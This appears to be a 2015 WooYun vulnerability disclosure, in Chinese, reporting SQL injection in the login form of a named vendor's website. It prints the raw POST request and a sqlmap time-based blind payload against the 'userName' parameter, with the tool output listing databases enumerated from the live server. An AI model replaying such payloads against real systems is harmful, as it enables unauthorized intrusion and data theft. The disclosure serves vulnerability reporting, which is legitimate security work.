当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118723

漏洞标题:云途明志某网站存在SQL注入

相关厂商:云途明志

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-06-08 12:47

修复时间:2015-06-13 12:48

公开时间:2015-06-13 12:48

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:1

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-08: 细节已通知厂商并且等待厂商处理中
2015-06-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

【HD】 以团队之名 以个人之荣耀 共建网络安全

详细说明:

POST数据包:

POST /wbcloud/Login/index/checkLogin/ HTTP/1.1
Host: www.1510cloud.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.1510cloud.com/wbcloud/login/Index
Content-Length: 49
Cookie: PHPSESSID=ttd1gkp07nakelg25221lv55l5
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
userName=admin&password=admin&verifyLogin=245141


userName 参数未过滤 导致了本次注入(具体参数见下图 或者 漏洞证明)

0.png


1.png


由于时间关系 这里就不跑了

漏洞证明:

POST parameter 'userName' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 105 HTTP(s) req
uests:
---
Parameter: userName (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: userName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))XvRr) AND 'qLn
n'='qLnn&password=admin&verifyLogin=245141
---
[21:51:49] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.4
back-end DBMS: MySQL 5.0.12
[21:51:49] [INFO] fetching database names
[21:51:49] [INFO] fetching number of databases
[21:51:49] [INFO] retrieved:
[21:51:49] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
7
[21:52:14] [INFO] retrieved:
[21:52:24] [INFO] adjusting time delay to 2 seconds due to good response times
inform
[21:54:26] [ERROR] invalid character detected. retrying..
[21:54:26] [WARNING] increasing time delay to 3 seconds
[21:54:43] [ERROR] invalid character detected. retrying..
[21:54:43] [WARNING] increasing time delay to 4 seconds
ation_schema
[22:01:10] [INFO] retrieved: backup
[22:04:19] [INFO] retrieved: import
[22:08:12] [INFO] retrieved: linksys
[22:12:15] [INFO] retrieved: mysql
[22:15:05] [INFO] retrieved: test
[22:17:28] [INFO] retrieved: unknow_back
available databases [7]:
[*] backup
[*] import
[*] information_schema
[*] linksys
[*] mysql
[*] test
[*] unknow_back
[22:23:46] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.1510cloud.com'
[*] shutting down at 22:23:46

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-13 12:48

厂商回复:

最新状态:

暂无

漏洞评价:

评论